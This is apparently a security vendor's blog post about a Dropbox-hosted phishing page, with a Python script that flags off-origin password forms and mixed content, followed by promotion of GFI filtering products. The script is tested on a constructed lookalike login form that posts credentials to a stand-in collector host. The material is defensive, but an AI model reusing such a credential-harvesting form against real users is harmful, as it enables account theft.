Talk about a meta sort of attack! Dropbox recently detected and shut down a spoofed login page that was hosted on Dropbox itself and designed to harvest users' credentials for Dropbox and for several popular webmail services. By hosting the fake login page within the Dropbox service, the attacker or attackers leveraged a number of things to convince victims that they were visiting a legitimate page rather than falling for a hoax. Here's how it worked.
The attackers created a well-designed web page that looked like a legitimate Dropbox login page and hosted it on Dropbox itself, in a user account set up for the purpose. They then sent emails to victims informing them that someone had tried to send them a large file, and advising them to click a link in the email to access the data. Of course, no one should click a link in an email they are not expecting, but we all know that users continue to do so. Since the URL was within a Dropbox domain, even careful users who copy and paste, or manually type in, a URL might see it as legitimate. The hoax page was served over HTTPS, since it was hosted in a user's Dropbox, so many users would see only the padlock icon and assume they were safe. The padlock, however, only means the connection to the host is encrypted; it says nothing about who uploaded the content the host is serving. Some elements of the page were loaded over plain HTTP, so some browsers might have warned users that not all content was secure, but mixed content is too common a failing of legitimate sites to count on as something that stops users from doing the wrong thing.
The form prompted users for their credentials, for either their Dropbox account or one of the popular webmail providers. After harvesting the credentials, the page simply redirected users to Dropbox's own login page, which looks much like what you see when a login fails or a web page malfunctions, so victims had little reason to suspect anything.
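The two tells described above, a password form that posts somewhere other than the page's own origin and page resources pulled in over plain HTTP, can be checked statically before a link is ever opened by a user. The script below is an added example written for this article, not code from Dropbox or from the original hoax page; the page URL, the hostnames and the HTML it analyses are constructed for illustration and are not the real phishing page.

```python
"""Static checks for a credential-harvesting page of the kind described above.

Added example; the hostnames and HTML below are constructed, not taken from
the actual Dropbox-hosted hoax page.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class FormScanner(HTMLParser):
    """Collect every form (resolved action URL, whether it has a password
    field) and every sub-resource fetched over plain HTTP."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []            # dicts: {"action": str, "has_password": bool}
        self.http_resources = []   # absolute URLs loaded over http://
        self._current = None       # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # Relative actions resolve against the page URL, like a browser does.
            self._current = {
                "action": urljoin(self.page_url, a.get("action") or ""),
                "has_password": False,
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

        # Mixed content: any script/image/stylesheet/frame fetched over http.
        if tag in ("script", "img", "link", "iframe"):
            src = a.get("src") or a.get("href")
            if src:
                url = urljoin(self.page_url, src)
                if urlparse(url).scheme == "http":
                    self.http_resources.append(url)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def analyze(page_url, html):
    """Return a list of human-readable findings for the page; empty means clean
    by these two checks (it does NOT prove the page is legitimate)."""
    scanner = FormScanner(page_url)
    scanner.feed(html)
    page_host = urlparse(page_url).hostname
    findings = []

    for form in scanner.forms:
        if not form["has_password"]:
            continue
        action_host = urlparse(form["action"]).hostname
        # A real login form posts back to the site you are logging in to.
        if action_host != page_host:
            findings.append(f"password form posts off-origin to {action_host}")

    if scanner.http_resources:
        findings.append(
            f"mixed content: {len(scanner.http_resources)} resource(s) over plain HTTP"
        )
    return findings


# Constructed sample: a lookalike login page on a file-hosting domain whose
# form sends the credentials to a collector elsewhere and pulls assets over http.
PAGE_URL = "https://files.example.com/u/12345/login.html"
PHISH_HTML = """
<html><head>
<link rel="stylesheet" href="http://cdn.example.net/login.css">
</head><body>
<img src="http://cdn.example.net/logo.png">
<form method="post" action="https://collector.example.net/grab.php">
  <input type="email" name="user">
  <input type="password" name="pass">
  <input type="submit" value="Sign in">
</form>
</body></html>
"""

# Constructed sample of what a genuine login page looks like under the same checks.
BENIGN_URL = "https://www.example.com/login"
BENIGN_HTML = """
<html><head><link rel="stylesheet" href="/static/login.css"></head><body>
<form method="post" action="/login">
  <input type="text" name="user"><input type="password" name="pass">
</form></body></html>
"""

if __name__ == "__main__":
    for finding in analyze(PAGE_URL, PHISH_HTML):
        print("FLAG:", finding)
    print("benign findings:", analyze(BENIGN_URL, BENIGN_HTML))
```

Both checks are heuristics to feed into a link-scanning or mail-filtering pipeline, not a verdict on their own: a legitimate site that outsources authentication to a single sign-on provider will also post its login form off-origin, and a phishing kit can just as easily post to the page's own host and forward the credentials server-side. What the example does show is that the padlock and the familiar domain in the address bar prove nothing about where a typed password ends up.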
Dropbox quickly detected and disabled access to the hoax page, and should be commended for its detection, rapid response and disclosure of the event. But all of that is reactive, and some users may already have become victims. As sysadmins, we need to be more proactive in how we defend users from these sorts of attacks.
To succeed, phishing messages have to get through to victims’ mailboxes. Proper mail filtering solutions can and should be used to detect and block phishing attacks like this. GFI MailEssentials can be used to not only filter out spam and malware, but also to detect and block phishing messages before they even get to your users. If there is no phishing message in their inbox, there is nothing for them to click on!
But the best defenses are layered ones, and should a phishing message get through to your users, you don’t want their own best judgment to be the only other protection. GFI WebMonitor offers active scanning of all downloads and blocks access to known harmful websites, like those that host malware, or are known phishing domains. By protecting users from compromised and malicious websites, you can protect them whether an email with a link gets through, they manually type in a URL, or they try to visit a legitimate site that fell victim to a compromise and is now serving malware.
Finally, it is worth mentioning that GFI MailArchiver offers archiving of both email and files. Using the File Archive Assistant, companies can manage and access important company files and email easily, and store them securely in an instantly accessible, compliant archive. The beauty of this is that users do not have to store and retrieve files from Dropbox or other cloud-based storage services, which removes one reason for them to expect a "someone sent you a file" message in the first place. Furthermore, from a compliance perspective, you get a comprehensive audit trail and retention policy features. This lowers risk while still connecting global employees and simplifying how they work together.
While this clever attack was quickly shut down by Dropbox, it won't be the last time an attacker turns a trusted service against its own users. Blocking all access to all external solutions is no solution at all, as many of these, Dropbox included, offer fantastic capabilities to users and businesses alike, but you have to provide that access in a safe and secure manner. Combining GFI MailEssentials with GFI WebMonitor gives you the one-two punch you need to knock out the opposition before they make victims of your users!